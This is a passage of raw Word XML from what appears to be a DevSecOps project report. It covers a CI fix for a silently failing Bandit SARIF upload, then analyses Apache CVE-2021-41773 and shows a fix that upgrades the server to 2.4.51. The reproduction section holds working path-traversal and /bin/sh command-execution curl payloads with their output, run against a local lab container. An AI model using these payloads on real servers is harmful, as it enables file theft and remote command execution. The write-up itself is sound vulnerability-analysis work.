        <w:t xml:space="preserve">annotation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>SAST (bandit): Path does not exist: bandit.sarif</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>. The upload step had</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">been failing silently since the first commit, because </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>bandit -f sarif</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>invalid choice on 1.8.0 — the SARIF formatter ships as an optional extra. Fixed by</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">installing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>bandit[sarif]==1.9.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> and adding a check that fails loudly when the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">report is missing, so </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>|| true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> can never hide it again. The analysis now lands in</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Security → Code scanning</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (tool </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Bandit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>, 0 results) and the run's remaining</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>annotations are runner-image warnings only.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40896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f-run-sarif-f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089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7"/>
        </w:rPr>
        <w:t>the commit that fixed the SARIF upload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863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e-run-late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863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7"/>
        </w:rPr>
        <w:t>the latest run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Green, but not silent.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> The latest run (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>39468208233</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>de0a524</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>, 21 s) carries</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>warnings rather than errors: several pinned actions still target Node 16 and are</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">forced onto Node 24, and the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>ubuntu-latest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> runner image migrates to Ubuntu 26 in</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>October. Neither fails the build; both are one-line dependency bumps, and the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>annotations panel is exactly where they belong until someone does them.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>docs/screenshots/01-ci-history.png</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (the run list),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>01b-run1-failed.png</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (SCA rejecting the build), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>01c-run-green.png</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (three jobs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">green), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>01d-sarif-error-before-fix.png</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (the annotation above),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>01f-run-sarif-fix.png</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (the fix landing), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>01e-run-latest.png</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (the current state),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>02b-ci-logs.png</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (the three gates' output).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>6. CVE analysis — CVE-2021-41773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shd w:val="clear" w:color="auto" w:fill="E8EE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4649"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8EE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4649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Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4649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Apache HTTP Server 2.4.49</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4649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Class</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4649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 xml:space="preserve">CWE-22 path traversal → RCE with </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
                <w:color w:val="9C272E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>mod_cgi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4649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CVSS 3.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4649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9.8 Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4649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Fixed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4649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2.4.51 (2.4.50 incomplete → CVE-2021-42013)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.1 Reproduction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Executed on Windows 11 + Docker Desktop (engine 29.9.1, Linux containers):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="113"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F8"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>git clone --depth 1 --filter=blob:none --sparse https://github.com/vulhub/vulhub.git</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>cd vulhub &amp;&amp; git sparse-checkout set httpd/CVE-2021-41773</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>cd httpd/CVE-2021-41773 &amp;&amp; docker compose up -d --build</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="113"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F8"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>curl -s --path-as-is \</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  'http://127.0.0.1:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd' | head -3</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t># root:x:0:0:root:/root:/bin/bash</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t># daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin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curl -s --path-as-is \</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  --data 'echo Content-Type: text/plain; echo; id' \</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  'http://127.0.0.1:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t># uid=1(daemon) gid=1(daemon) groups=1(daemon)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Both requests returned </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>200</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>. Full transcript, payload anatomy and the eight</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">captured evidence images: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>docs/CVE-2021-41773-walkthrough.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>docs/screenshots/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.2 Root cause</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Three conditions, all required:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="454" w:hanging="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="2E5496"/>
        </w:rPr>
        <w:t xml:space="preserve">1.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Normalisation bug.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.4.49 rewrote </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>ap_normalize_path()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>. It checked for</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">   traversal on a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>partially decoded</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> path and decoded </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>%2e%2e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>..</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> only</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">   later, at file-open time — validate-then-decode instead of</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">   decode-then-validate. The guard therefore never saw the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>..</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="454" w:hanging="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="2E5496"/>
        </w:rPr>
        <w:t xml:space="preserve">2.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Authorisation default.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.4.49 changed the filesystem root default from</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Require all denied</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Require all granted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>, so the escaped path was served</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">   instead of being denied by default policy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="454" w:hanging="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="2E5496"/>
        </w:rPr>
        <w:t xml:space="preserve">3.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>`mod_cgi`.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> The CGI handler executes the file the path resolves to and pipes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">   the request body to stdin, so </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>/bin/sh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> turns file read into command execution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>2.4.50 blocked the single-encoded form but kept the wrong ordering, so a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>double-encoded payload (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>%%32%65</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>%2e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>) still passed — CVE-2021-42013.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.3 Fix</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="113"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F8"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>-    image: vulhub/httpd:2.4.49</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>+    image: httpd:2.4.51</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="113"/>
